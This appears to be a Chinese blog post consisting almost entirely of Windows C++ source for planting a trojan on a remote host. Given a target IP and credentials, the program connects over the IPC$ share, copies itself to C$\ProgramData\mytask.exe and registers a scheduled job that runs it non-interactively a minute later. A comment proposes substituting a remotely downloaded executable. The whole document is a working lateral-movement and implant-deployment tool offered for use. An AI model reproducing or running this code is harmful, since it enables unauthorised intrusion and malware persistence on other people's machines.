实现:ipc管道连接到远程计划任务种马
#pragma comment(lib, "mpr.lib")
#pragma comment(lib,"Netapi32.lib")
#include <windows.h>
#include <lm.h>
#include <tchar.h>
#include <stdio.h>
#include <Winnetwk.h>
#include <string>
#include <lmat.h>
//using namespace std;
void GetError(DWORD ret) {
wchar_t * pMsgBuf;
FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS
, NULL, ret, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPSTR)&pMsgBuf, 0, NULL);
wprintf(L"WNetAddConnection2 failed with error: %u, %s
", ret, pMsgBuf);
LocalFree(pMsgBuf);
}
int wmain(int argc, wchar_t * argv[]) {
/*
DWORD WNetAddConnection2W(
LPNETRESOURCEW lpNetResource,
LPCWSTR lpPassword,
LPCWSTR lpUserName,
DWORD dwFlags
);
*/
DWORD dwRetVal;
std::wstring MyRemoteName;
NETRESOURCE nr;
DWORD dwFlags;
MyRemoteName.append(L"\\");
if (argc != 5 && argc != 4) {
wprintf(L"Usage: %s <localname> <remotename> <username> <password>
",argv[0]);
wprintf(L"Usage: %s <remotename> <username> <password>
",argv[0]);
exit(1);
}
if (argc == 5) {
MyRemoteName.append(argv[2]);
wprintf(L"Calling WNetAddConnection2 with
");
wprintf(L" lpLocalName = %s
", argv[1]);
wprintf(L" lpRemoteName = %s
", MyRemoteName.c_str());
wprintf(L" lpUsername = %s
", argv[3]);
wprintf(L" lpPassword = %s
", argv[4]);
memset(&nr, 0, sizeof(NETRESOURCE));
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = argv[1];
nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str();
nr.lpProvider = NULL;
dwFlags = CONNECT_TEMPORARY; //连接类型 是否可持续
dwRetVal = WNetAddConnection2(&nr, argv[4], argv[3], dwFlags);
if (dwRetVal == NO_ERROR) {
wprintf(L"Connection added to %s
", nr.lpRemoteName);
}
else {
GetError(dwRetVal);
}
}
else if (argc == 4) {
MyRemoteName.append(argv[1]);
wprintf(L"Calling WNetAddConnection2 with
");
wprintf(L"lpRemoteName = %s
", (LPWSTR)MyRemoteName.c_str());
wprintf(L"lpUsername = %s
", argv[2]);
wprintf(L"lpPassword = %s
", argv[3]);
//结构体初始化
memset(&nr, 0, sizeof(NETRESOURCE));
//结构体的补充,这四个必须填写
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL; //本地映射磁盘
nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str(); // 远程访问的资源
nr.lpProvider = NULL;
dwFlags = CONNECT_TEMPORARY; //连接类型 是否可持续
dwRetVal = WNetAddConnection2(&nr,argv[3], argv[2], dwFlags);
if (dwRetVal == NO_ERROR){
//IPC管道成功连接
wprintf(L"Connection added to %s
", nr.lpRemoteName);
//RemoteFilePath字符串用来拼接路径
std::wstring RemoteFilePath;
RemoteFilePath = MyRemoteName.append(L"\c$\ProgramData\mytask.exe"); // \192.168.1.152c$ProgramDatamytask.exe
//复制文件到对方的机器的指定目录中
wchar_t LocalModuleEXE[MAX_PATH];
GetModuleFileName(NULL, LocalModuleEXE, MAX_PATH); //得到当前执行文件的文件名称 (包含路径) 之后可以改为远程下载的指定exe程序等....
if (CopyFile(LocalModuleEXE, RemoteFilePath.c_str(), FALSE) != 0) { //复制文件 若存在则覆盖
//获取远程服务器的当前时间
wprintf(L"copyfile successful
");
//初始化结构体
LPTIME_OF_DAY_INFO ti = NULL;
std::wstring MyRemoteServerName;
//MyRemoteServerName字符串用来作为 \ip 这样的形式进行调用
MyRemoteServerName.append(L"\\");
MyRemoteServerName.append(argv[1]);
if (NetRemoteTOD(MyRemoteServerName.c_str(), (LPBYTE *)&ti) == NERR_Success) {
wprintf(L"Get remote time successful
");
//拼接字符串进行计划任务的添加
//DWORD day = 1;
wchar_t command[] = L"c:\ProgramData\mytask.exe";
AT_INFO at; //结构体的设置
at.DaysOfWeek = 0;
at.DaysOfMonth = 0;
at.Flags = JOB_NONINTERACTIVE; //非交互式运行程序
at.JobTime = ((ti->tod_hours + (-ti->tod_timezone) / 60) % 24) * 60 * 60 * 1000 + (ti->tod_mins + 1) * 60 * 1000;
at.Command = command; //需要执行的命令内容
DWORD id;
if(NetScheduleJobAdd(MyRemoteServerName.c_str(),(LPBYTE)&at,&id) == NERR_Success){
wprintf(L"Job add successful
");
}
else {
wprintf(L"Job add failed
");
}
}
else {
wprintf(L"Get remote time failed
");
}
}
else {
wprintf(L"copyfile failed
");
}
}
else {
GetError(dwRetVal);
}
}
return 0;
}
参考文章:https://blog.****.net/weixin_34408624/article/details/86248485